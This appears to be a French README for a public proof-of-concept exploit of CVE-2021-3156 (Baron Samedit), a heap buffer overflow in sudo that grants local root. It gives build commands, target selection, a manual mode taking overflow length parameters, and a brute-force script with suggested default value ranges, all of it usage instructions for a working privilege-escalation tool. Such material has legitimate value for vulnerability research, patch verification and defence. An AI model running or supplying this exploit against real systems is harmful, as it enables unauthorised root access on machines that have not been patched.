
Preuve de concept d'exploitation pour CVE-2021-3156 (Baron Samedit), un débordement de tampon basé sur le tas dans sudo permettant une élévation locale de privilèges vers root. Prend en charge plusieurs cibles et un mode de force brute.
Ceci est un exploit pour la vulnérabilité sudo CVE-2021-3156 (surnommée Baron Samedit par Qualys).
compilation :
$ make
liste des cibles :
$ ./sudo-hax-me-a-sandwich
exécution :
$ ./sudo-hax-me-a-sandwich <target_number>
mode manuel :
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
Assurez-vous d'avoir GNU parallel installé.
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
quelques valeurs par défaut à essayer :
$ ./brute.sh 90 120 50 70 150 300
Cela dévorera tous les cœurs disponibles. N'essayez pas de faire du netflix & brute.
Envoyez des PR (raisonnables), je pourrais les fusionner.
Quelques idées :